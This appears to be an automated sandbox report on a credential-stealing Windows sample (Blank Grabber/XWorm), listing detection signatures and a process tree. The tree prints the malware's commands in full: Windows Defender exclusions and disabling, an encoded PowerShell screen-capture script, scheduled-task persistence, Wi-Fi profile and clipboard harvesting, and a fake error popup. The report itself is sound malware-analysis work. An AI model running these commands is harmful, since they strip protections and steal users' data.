Edit tour

Windows Analysis Report
sB2ClgrGng.exe

Overview

General Information

Sample name:	sB2ClgrGng.exe renamed because original name is a hash value
Original sample name:	d69647cf1c96e058e4a9ed4887cc08a36c863751e711f98171e32cdc36478eda.exe
Analysis ID:	1532621
MD5:	4667ad84b811400babc982785614bb5f
SHA1:	0016a4d0e998382722895dee4a062c0c318e37bf
SHA256:	d69647cf1c96e058e4a9ed4887cc08a36c863751e711f98171e32cdc36478eda
Tags:	BlankGrabberexeuser-Chainskilabs
Infos:

Detection

Blank Grabber, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected Blank Grabber

Yara detected Python Keylogger

Yara detected Telegram RAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Removes signatures from Windows Defender

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses netsh to modify the Windows network and firewall settings

Uses schtasks.exe or at.exe to add and modify task schedules

Uses shutdown.exe to shutdown or reboot the system

Uses the Telegram API (likely for C&C communication)

Writes or reads registry keys via WMI

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Execution of Shutdown

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious Screensaver Binary File Creation

Stores files to the Windows start menu directory

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

sB2ClgrGng.exe (PID: 5816 cmdline: "C:\Users\user\Desktop\sB2ClgrGng.exe" MD5: 4667AD84B811400BABC982785614BB5F)

sB2ClgrGng.exe (PID: 2892 cmdline: "C:\Users\user\Desktop\sB2ClgrGng.exe" MD5: 4667AD84B811400BABC982785614BB5F)

cmd.exe (PID: 4248 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7188 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 5544 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7224 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 7616 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 7072 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7292 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 1228 cmdline: C:\Windows\system32\cmd.exe /c "start bound.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

bound.exe (PID: 7280 cmdline: bound.exe MD5: 8D8BC4B4831CCCE11284D512630749C5)

schtasks.exe (PID: 7076 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 2596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

shutdown.exe (PID: 8592 cmdline: shutdown.exe /f /s /t 0 MD5: F2A4E18DA72BB2C5B21076A5DE382A20)

conhost.exe (PID: 8676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6980 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 7272 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cmd.exe (PID: 7320 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7408 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7660 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7968 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7676 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7956 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7852 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7988 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7872 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8052 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7452 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7992 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 8116 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8196 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8056 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 8208 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 8052 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 8312 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 8392 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8556 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 8792 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 8980 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADCB.tmp" "c:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 8740 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8880 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8768 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 8872 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 9172 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7848 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7912 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8304 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8328 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8288 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

